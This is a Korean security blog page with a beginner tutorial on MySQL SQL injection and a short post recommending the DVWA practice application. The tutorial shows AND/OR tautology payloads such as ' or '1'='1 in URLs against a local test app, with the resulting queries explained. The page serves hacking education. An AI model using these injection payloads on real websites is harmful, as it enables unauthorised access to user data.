MySQL SQL Injection 기초(and, or)

Posted by nopsled
2014.03.12 16:54

http://wh1ant.kr/archives/[Hangul] False SQL injection and Advanced blind SQL injection.txt

시작하기전 위 내용에 나와있는 소스를 사용 및 수정하여 vunlerable web application을 구성하고 포스팅 하였습니다.

   

   

 AND

127.0.0.1/info.php?num=1' and '1'='1 (True)

Query : select * from users where num='1' and '1'='1'

Users테이블에서 num이 1인것 그리고 1이 1과 같다면 출력해라.

And의 경우 앞과 뒤 모두 참이어야 합니다.

   

127.0.0.1/info.php?num=1' and '1'<'1 (False)

Query : select * from users where num='1' and '1'<'1'

Users테이블에서 num이 1인것 그리고 1이 1보다 크다면 출력해라.

둘중에 하나라도 거짓이라면 출력되지 않습니다.

 

 

  



OR 

127.0.0.1/info.php?num=1' or '1'='1;

Query : select * from users where num='1' or '1'='1'

Users라는 테이블에서 num이 1인것 또는 1=1이 같다면 출력해라.

1과 1은 같기 때문에 모두 출력합니다.


127.0.0.1/info.php?num=1' or '1'>'1;

Query : select * from users where num='1' or '1'>'1'

Users라는 테이블에서 num이 1인것 또는 1이 1보다 크다면 출력해라.

1>1은 False이므로 num이 1인것만 출력되었습니다.

신고

'' 카테고리의 다른 글

webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
MySQL SQL Injection 기초(and, or)  (0) 2014.03.12
DVWA - Damn Vulnerable Web Application  (0) 2014.03.12

DVWA - Damn Vulnerable Web Application

Posted by nopsled
2014.03.12 14:15

http://www.dvwa.co.uk/


웹해킹을 연습할 수 있으며, APM_SETUP혹은 APACHE와 같이 사용하시면 됩니다.

난이도는 Low, Medium, Hight이 있으며 각각 난이도에 맞는 시큐어코딩이 되어 있어 단계별로 학습하기 좋은 Vulnerable Web Application입니다.




DVWA-1.0.8.zip

md5 : ac29f9b26d4f9f821cb82b2214da463a


APM SETUP

md5 : bdcd1790e2ade2c2e5e274a30c8ffbcd

 

저작자 표시 비영리
신고

'' 카테고리의 다른 글

webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
MySQL SQL Injection 기초(and, or)  (0) 2014.03.12
DVWA - Damn Vulnerable Web Application  (0) 2014.03.12

티스토리 툴바